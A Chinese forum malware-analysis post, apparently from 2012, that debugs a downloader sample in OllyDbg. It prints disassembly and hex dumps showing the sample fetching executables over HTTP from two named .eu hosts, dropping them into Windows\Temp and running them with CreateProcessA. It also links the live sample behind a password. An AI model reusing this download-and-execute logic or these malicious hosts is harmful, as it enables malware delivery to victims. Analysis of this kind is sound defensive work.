|
[文件标题]:又见下载者,简单分析 [文章作者]:willJ [作者邮箱]:466684954@qq.com [软件名称]: 3.exe [下载地址]:附件 [运行环境]:Windows xp sp3 [使用工具]:OD,PEID [作者声明]: 只是感兴趣,没有其他目的。失误之处敬请诸位大侠赐教!
[详细过程]: 最近在网上下载了一个样本分析下,主要很多杀毒不杀,将自己的分析过程写出来和大家一起分享,希望各位大大多多指教。 习惯,首先我在PEID中查壳: 深度或者核心扫描也找不到是什么壳,可能我的PEID很久没有更新了吧,呵呵,打开区段看看呢: 感觉都是正常的区段命名,罢了,直接上OD 吧,既然加壳了,我们就脱壳吧,一个esp ,然后单步都了下,到了这里: 00401793 55 push ebp
00401794 8BEC mov ebp,esp
00401796 83E4 F8 and esp,0xFFFFFFF8
00401799 83EC 24 sub esp,0x24
0040179C 53 push ebx
0040179D 56 push esi
0040179E 57 push edi
0040179F E8 54FBFFFF call 3.004012F8 ; 获取网络连接相关API
004017A4 BE 10304000 mov esi,3.00403010
004017A9 56 push esi
004017AA 68 02020000 push 0x202
004017AF FF15 BC314000 call dword ptr ds:[0x4031BC]
004017B5 85C0 test eax,eax
004017B7 74 25 je X3.004017DE
004017B9 56 push esi
004017BA 6A 02 push 0x2
004017BC FF15 BC314000 call dword ptr ds:[0x4031BC]
004017C2 85C0 test eax,eax
感觉这里像OEP,于是尝试脱壳,可是脱下来还是说有壳,不管了,直接带壳调试吧 上面的40179F是关键的CALL,他是获取各种网络相关的API,咱们跟进去看看 004012F8 53 push ebx
004012F9 8B1D 18204000 mov ebx,dword ptr ds:[0x402018] ; kernel32.GetModuleHandleA
004012FF 55 push ebp
00401300 56 push esi
00401301 57 push edi
00401302 BE 44204000 mov esi,3.00402044 ; ASCII "wsock32.dll"
00401307 56 push esi
00401308 FFD3 call ebx
0040130A 8B2D 14204000 mov ebp,dword ptr ds:[0x402014] ; kernel32.LoadLibraryA
00401310 8BF8 mov edi,eax
00401312 85FF test edi,edi
00401314 75 05 jnz X3.0040131B
00401316 56 push esi
00401317 FFD5 call ebp
00401319 8BF8 mov edi,eax
0040131B 8B35 10204000 mov esi,dword ptr ds:[0x402010] ; kernel32.GetProcAddress
00401321 68 50204000 push 3.00402050 ; ASCII "WSACleanup"
00401326 57 push edi
00401327 FFD6 call esi
00401329 68 5C204000 push 3.0040205C ; ASCII "WSAGetLastError"
0040132E 57 push edi
0040132F A3 A0314000 mov dword ptr ds:[0x4031A0],eax
00401334 FFD6 call esi
00401336 68 6C204000 push 3.0040206C ; ASCII "closesocket"
0040133B 57 push edi
0040133C A3 A4314000 mov dword ptr ds:[0x4031A4],eax
00401341 FFD6 call esi
00401343 68 78204000 push 3.00402078 ; ASCII "connect"
00401348 57 push edi
00401349 A3 A8314000 mov dword ptr ds:[0x4031A8],eax
0040134E FFD6 call esi
00401350 68 80204000 push 3.00402080 ; ASCII "htons"
00401355 57 push edi
00401356 A3 AC314000 mov dword ptr ds:[0x4031AC],eax
0040135B FFD6 call esi
0040135D 68 88204000 push 3.00402088 ; ASCII "gethostbyname"
00401362 57 push edi
00401363 A3 B0314000 mov dword ptr ds:[0x4031B0],eax
00401368 FFD6 call esi
0040136A 68 98204000 push 3.00402098 ; ASCII "socket"
0040136F 57 push edi
00401370 A3 B4314000 mov dword ptr ds:[0x4031B4],eax
00401375 FFD6 call esi
00401377 68 A0204000 push 3.004020A0 ; ASCII "WSAStartup"
0040137C 57 push edi
0040137D A3 B8314000 mov dword ptr ds:[0x4031B8],eax
00401382 FFD6 call esi
00401384 68 AC204000 push 3.004020AC ; ASCII "recv"
00401389 57 push edi
0040138A A3 BC314000 mov dword ptr ds:[0x4031BC],eax
0040138F FFD6 call esi
00401391 68 B4204000 push 3.004020B4 ; ASCII "send"
00401396 57 push edi
00401397 A3 C0314000 mov dword ptr ds:[0x4031C0],eax
0040139C FFD6 call esi
0040139E BF BC204000 mov edi,3.004020BC ; ASCII "ntdll.dll"
004013A3 57 push edi
004013A4 A3 C4314000 mov dword ptr ds:[0x4031C4],eax
004013A9 FFD3 call ebx
004013AB 85C0 test eax,eax
004013AD 75 03 jnz X3.004013B2
004013AF 57 push edi
004013B0 FFD5 call ebp
004013B2 68 C8204000 push 3.004020C8 ; ASCII "ZwUnmapViewOfSection"
004013B7 50 push eax
004013B8 FFD6 call esi
004013BA 5F pop edi
004013BB 5E pop esi
004013BC 5D pop ebp
004013BD A3 08304000 mov dword ptr ds:[0x403008],eax
004013C2 5B pop ebx
004013C3 C3 retn
走出这个call之后,下面的函数名就全部显示出来了 004017A9 56 push esi
004017AA 68 02020000 push 0x202
004017AF FF15 BC314000 call dword ptr ds:[0x4031BC] ; WS2_32.WSAStartup
004017B5 85C0 test eax,eax
004017B7 74 25 je X3.004017DE
这个函数就是完成对Winsock服务的初始化,如果失败程序就直接退出了,所以虚拟机里要保持网络顺畅 004014B3 55 push ebp
004014B4 8BEC mov ebp,esp
004014B6 83EC 14 sub esp,0x14
004014B9 6A 06 push 0x6
004014BB 6A 01 push 0x1
004014BD 6A 02 push 0x2
004014BF FF15 B8314000 call dword ptr ds:[0x4031B8] ; WS2_32.socket
004014C5 8906 mov dword ptr ds:[esi],eax
004014C7 83F8 FF cmp eax,-0x1
004014CA 75 04 jnz X3.004014D0
004014CC 32C0 xor al,al
004014CE C9 leave
004014CF C3 retn
004014D0 FF75 08 push dword ptr ss:[ebp+0x8]
004014D3 FF15 B4314000 call dword ptr ds:[0x4031B4] ; WS2_32.gethostbyname
004014D9 85C0 test eax,eax
004014DB 75 0A jnz X3.004014E7
004014DD FF36 push dword ptr ds:[esi]
004014DF FF15 A8314000 call dword ptr ds:[0x4031A8] ; WS2_32.closesocket
004014E5 ^ EB E5 jmp X3.004014CC
004014E7 8B40 0C mov eax,dword ptr ds:[eax+0xC]
004014EA 6A 04 push 0x4
004014EC FF30 push dword ptr ds:[eax]
004014EE 8D45 F0 lea eax,dword ptr ss:[ebp-0x10]
004014F1 50 push eax
004014F2 E8 A3FBFFFF call 3.0040109A
004014F7 83C4 0C add esp,0xC
004014FA 6A 02 push 0x2
004014FC 58 pop eax
004014FD 6A 50 push 0x50
004014FF 66:8945 EC mov word ptr ss:[ebp-0x14],ax
00401503 FF15 B0314000 call dword ptr ds:[0x4031B0] ; WS2_32.ntohs
00401509 66:8945 EE mov word ptr ss:[ebp-0x12],ax
0040150D 6A 10 push 0x10
0040150F 8D45 EC lea eax,dword ptr ss:[ebp-0x14]
00401512 50 push eax
00401513 FF36 push dword ptr ds:[esi]
00401515 FF15 AC314000 call dword ptr ds:[0x4031AC] ; WS2_32.connect
0040151B 33C9 xor ecx,ecx
0040151D 83F8 FF cmp eax,-0x1
00401520 0F95C1 setne cl
00401523 8AC1 mov al,cl
00401525 C9 leave
00401526 C3 retn
创建socket连接,然后就是请求命令去下载文字: 00193FF8 47 45 54 20 2F 70 6C 75 73 30 30 31 2E 65 78 65 GET /plus001.exe
00194008 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F 73 74 3A HTTP/1.0..Host:
00194018 20 63 6F 63 79 78 6D 69 2E 65 75 cocyxmi.eu
意思就是从cocyxmi.eu域名去下载一个plus001.exe的文件,可能我的虚拟机里网络不好,我没有下载成功,我就去手动下载了,好,继续 004015DD 6A 00 push 0x0
004015DF 57 push edi
004015E0 FF35 D4314000 push dword ptr ds:[0x4031D4]
004015E6 FF75 08 push dword ptr ss:[ebp+0x8]
004015E9 FF15 C0314000 call dword ptr ds:[0x4031C0] ; WSOCK32.recv
004015EF 8BF0 mov esi,eax
004015F1 85F6 test esi,esi
接收反馈的内容,是下载成功,还是失败 00401629 50 push eax
0040162A FF15 28204000 call dword ptr ds:[0x402028] ; kernel32.GetWindowsDirectoryA
00401630 8B35 1C204000 mov esi,dword ptr ds:[0x40201C] ; kernel32.lstrcatA
00401636 68 18214000 push 3.00402118 ; ASCII "\Temp\_ex-"
0040163B 8D85 94FDFFFF lea eax,dword ptr ss:[ebp-0x26C]
00401641 50 push eax
00401642 FFD6 call esi
00401644 E8 1FFAFFFF call 3.00401068
00401649 8D4D F4 lea ecx,dword ptr ss:[ebp-0xC]
0040164C 51 push ecx
0040164D 50 push eax
0040164E E8 B2FBFFFF call 3.00401205
00401653 8B45 F8 mov eax,dword ptr ss:[ebp-0x8]
00401656 59 pop ecx
00401657 59 pop ecx
00401658 8B4D F4 mov ecx,dword ptr ss:[ebp-0xC]
0040165B 8D4408 FD lea eax,dword ptr ds:[eax+ecx-0x3]
0040165F 50 push eax
00401660 8D85 94FDFFFF lea eax,dword ptr ss:[ebp-0x26C]
00401666 50 push eax
00401667 FFD6 call esi
00401669 8D45 F4 lea eax,dword ptr ss:[ebp-0xC]
0040166C 50 push eax
0040166D E8 69FCFFFF call 3.004012DB
00401672 8D85 94FDFFFF lea eax,dword ptr ss:[ebp-0x26C]
00401678 C70424 24214000 mov dword ptr ss:[esp],3.00402124 ; ASCII ".exe"
0040167F 50 push eax
00401680 FFD6 call esi
00401682 33F6 xor esi,esi
00401684 56 push esi
00401685 56 push esi
00401686 6A 02 push 0x2
00401688 56 push esi
00401689 56 push esi
0040168A 68 00000040 push 0x40000000
0040168F 8D85 94FDFFFF lea eax,dword ptr ss:[ebp-0x26C]
00401695 50 push eax
00401696 FF15 24204000 call dword ptr ds:[0x402024] ; kernel32.CreateFileA
0040169C 8BF8 mov edi,eax
0040169E 3BFE cmp edi,esi
004016A0 75 04 jnz X3.004016A6
004016A2 32C0 xor al,al
004016A4 EB 5F jmp X3.00401705
004016A6 56 push esi
004016A7 8D45 F0 lea eax,dword ptr ss:[ebp-0x10]
004016AA 50 push eax
004016AB 53 push ebx
004016AC FF75 08 push dword ptr ss:[ebp+0x8]
004016AF 57 push edi
004016B0 FF15 2C204000 call dword ptr ds:[0x40202C] ; kernel32.WriteFile
004016B6 57 push edi
004016B7 FF15 38204000 call dword ptr ds:[0x402038] ; kernel32.CloseHandle
004016BD 395D F0 cmp dword ptr ss:[ebp-0x10],ebx
004016C0 ^ 75 E0 jnz X3.004016A2
这里是获取Windows目录,在下面的Temp文件夹穿件了一个名字为_ex-68.exe的程序 004016D9 8D45 94 lea eax,dword ptr ss:[ebp-0x6C]
004016DC 50 push eax
004016DD 8D45 A4 lea eax,dword ptr ss:[ebp-0x5C]
004016E0 50 push eax
004016E1 56 push esi
004016E2 56 push esi
004016E3 56 push esi
004016E4 56 push esi
004016E5 56 push esi
004016E6 56 push esi
004016E7 8D85 94FDFFFF lea eax,dword ptr ss:[ebp-0x26C]
004016ED 50 push eax
004016EE 56 push esi
004016EF 897D A4 mov dword ptr ss:[ebp-0x5C],edi
004016F2 C745 D0 0100000>mov dword ptr ss:[ebp-0x30],0x1
004016F9 FF15 34204000 call dword ptr ds:[0x402034] ; kernel32.CreateProcessA
然后将刚释放的文件通过CreateProcessA跑起来 00401527 /$ 53 push ebx
00401528 |. 56 push esi
00401529 |. 57 push edi
0040152A |. 68 00100000 push 0x1000
0040152F |. E8 CCFAFFFF call 3.00401000
00401534 |. 8B35 1C204000 mov esi,dword ptr ds:[0x40201C] ; |kernel32.lstrcatA
0040153A |. 8BF8 mov edi,eax ; |
0040153C |. C70424 E42040>mov dword ptr ss:[esp],3.004020E4 ; |ASCII "GET "
00401543 |. 57 push edi ; |ConcatString
00401544 |. C607 00 mov byte ptr ds:[edi],0x0 ; |
00401547 |. FFD6 call esi ; \lstrcatA
00401549 |. FF7424 18 push dword ptr ss:[esp+0x18] ; /StringToAdd
0040154D |. 57 push edi ; |ConcatString
0040154E |. FFD6 call esi ; \lstrcatA
00401550 |. 68 0C214000 push 3.0040210C ; /StringToAdd = " HTTP/1.0
"
00401555 |. 57 push edi ; |ConcatString
00401556 |. FFD6 call esi ; \lstrcatA
00401558 |. 68 EC204000 push 3.004020EC ; /StringToAdd = "Host: "
0040155D |. 57 push edi ; |ConcatString
0040155E |. FFD6 call esi ; \lstrcatA
00401560 |. FF7424 14 push dword ptr ss:[esp+0x14] ; /StringToAdd
00401564 |. 57 push edi ; |ConcatString
00401565 |. FFD6 call esi ; \lstrcatA
00401567 |. 68 F4204000 push 3.004020F4 ; /StringToAdd = "
"
0040156C |. 57 push edi ; |ConcatString
0040156D |. FFD6 call esi ; \lstrcatA
0040156F |. 57 push edi ; /String
00401570 |. FF15 00204000 call dword ptr ds:[0x402000] ; \lstrlenA
00401576 |. 6A 00 push 0x0 ; /Flags = 0
00401578 |. 8BF0 mov esi,eax ; |
0040157A |. 56 push esi ; |DataSize
0040157B |. 57 push edi ; |Data
0040157C |. FF7424 1C push dword ptr ss:[esp+0x1C] ; |Socket
00401580 |. FF15 C4314000 call dword ptr ds:[0x4031C4] ; \send
Send的内容: 00195E28 47 45 54 20 2F 6E 6F 74 65 70 61 64 2E 65 78 65 GET /notepad.exe
00195E38 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F 73 74 3A HTTP/1.0..Host:
00195E48 20 7A 61 77 66 79 65 76 2E 65 75 zawfyev.eu
向域名zawfyev.eu请求下载notepad.exe。我的机子又是没有下载下来,我只有手动去下载了。 接着又执行了一次在Windows目录,在下面的Temp文件夹穿件了一个名字为_ex-68.exe的程序,然后同通过CreateProcess调用起这个生成的exe 然后我的这个exe就进入了一个强大的sleep阶段 00401770 53 push ebx
00401771 FFD7 call edi ; kernel32.Sleep
Ebx等于000927C0这么多啊,一个小时啊,sleep这么久,可能是想让下载的程序顺利下载吧,算了,大概看了看程序的功能就这些吧,关键应该是生产的那个文件和下载的那个两个程序的问题了,一个居然叫notepad.exe,明显有问题嘛,下载的plus001.exe也是一个未知壳,不过也可以带壳调试,它将自己加入了启动项,下载的notepad.exe加的是一个UPX,直接esp可以搞定,生成的那个文件我尝试用OD,还有别的工具去检测,居然说不是有效WIN32程序,看来作者做了免杀操作的,或者这些EXE还会去下载更多的程序进来吧,好啦,就分析到这里了,还请各位大大多多指教小弟啊。 附件(有毒,小心使用)解压密码:52pojie
|
发表于 2012-3-15 10:18
发表于 2012-3-15 10:21
